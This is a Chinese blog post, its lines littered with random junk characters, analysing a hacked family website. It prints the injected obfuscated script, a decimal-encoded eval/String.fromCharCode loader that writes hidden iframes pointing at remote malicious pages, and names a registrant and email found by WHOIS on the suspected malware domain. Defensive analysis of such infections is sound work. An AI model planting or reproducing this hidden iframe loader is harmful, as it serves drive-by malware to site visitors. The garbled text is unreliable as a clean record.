首发在我的博客里面,
nKPvAe( ~Y]*TP http://www.areway.cn/?p=175 BiI?eT+ s
wgn( - G$FNofQx 周末上线鸭子就Q我说他的站给挂了马,当时没太注意就直接打开了连接,截下了网页源码:
tai Hry*.s - <script>t=’60,105,102,114,97,109,101,
j[2?}? 32,115,114,99,61,104,116,116,112,58,47,47,
EA_6L\+8& 102,114,101,101,46,117,45,117,117,117,46,99,
7v\K,P8 110,47,101,114,114,111,114,46,104,116,109,
?ra6Lo 32,119,105,100,116,104,61,49,48,48,32,104,
YbjeM6#E 101,105,103,104,116,61,48,62,60,47,105,102,
BIyNiol$AJ 114,97,109,101,62′;
s2s}5b3 t=eval(’String.fromCharCode(’+t+’)');document.write(t);</script>
j<[+vrj 4|i.b?" <script>t=’60,105,102,114,97,109,101,32,115,
0`y;[qAG[ 114,99,61,104,116,116,112,58,47,47,102,114,
yf5X=f.%@ 101,101,46,117,45,117,117,117,46,99,110,47,
)Nv$ SH 101,114,114,111,114,46,104,116,109,32,119,
G4DuqN~2m 105,100,116,104,61,49,48,48,32,104,101,105,
`uK_}Vy_ 103,104,116,61,48,62,60,47,105,102,114,97,
$42%H# 109,101,62′;t=eval(’String.fromCharCode(’+t+’)');
qC<!!473 ? document.write(t);</script>
l{OU\ -OY[x|0 <html xmlns=”
Gc6`]7 s http://www.w3.org/1999/xhtml (KQAKEhD! “>
=<~/U? <head>
=pHWqGOD <!– Published By Newasp.cc 2007-12-7-18:03:23 –>
ra#s!m1 <meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ />
O{WJi;l <title>首页 - 爱生活家庭网
GR&T
Z DxX333vC 上面有一段 script的十进制加密字段,里面的大概内容是,把所有的字符放在函数t里面,最后用doucment.write(t)来把字符串写在网页里面。
NKae~ 1b 转换字符串后的大概内容是(谁点击后果自付):
D4jf%7X!Lu <script>t=’<iframe src=http://free.u-uuu.cn/error.htm width=………
f{_K%0* (W.euQy 查询玉米u-uuu.cn的详细信息:
'J*)o<% Domain Name: u-uuu.cn
Q5R7se_ ROID: 20070901s10001s64972306-cn
&Uqm3z?v Domain Status: ok
uYk4qorA Registrant Organization: 王雷
8'c_&\kdv Registrant Name: 王雷
%\xwu(|kN Administrative Email:
czlovexs@126.com .^]=h#[e Sponsoring Registrar: 北京万网志成科技有限公司
{-X8MisI Name Server:ns.yovole.com
N[G<&f9 Name Server:ns1.yovole.com
-t28"jyj Registration Date: 2007-09-01 17:54
~c8Z9[QW Expiration Date: 2008-09-01 17:54
h9Zf4@w 最后PING了一下地址 都没有什么….
7=jeq|&kN xv!
QO 上虚拟机里面继续分析,IE里面打开上面的连接…查看源代码…..直接又有嵌套.
mRIW9V <iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe>
MguH)r`uT <script language=”javascript” src=”
h#p1wK;N http://count43.51yes.com/click.aspx?id=4333375720&logo=6″></script tmAc=?|Wa >
)KvQaC 这个玉米应该有可能是木马作者的:
~;aSE foafau.info的详细信息:
e<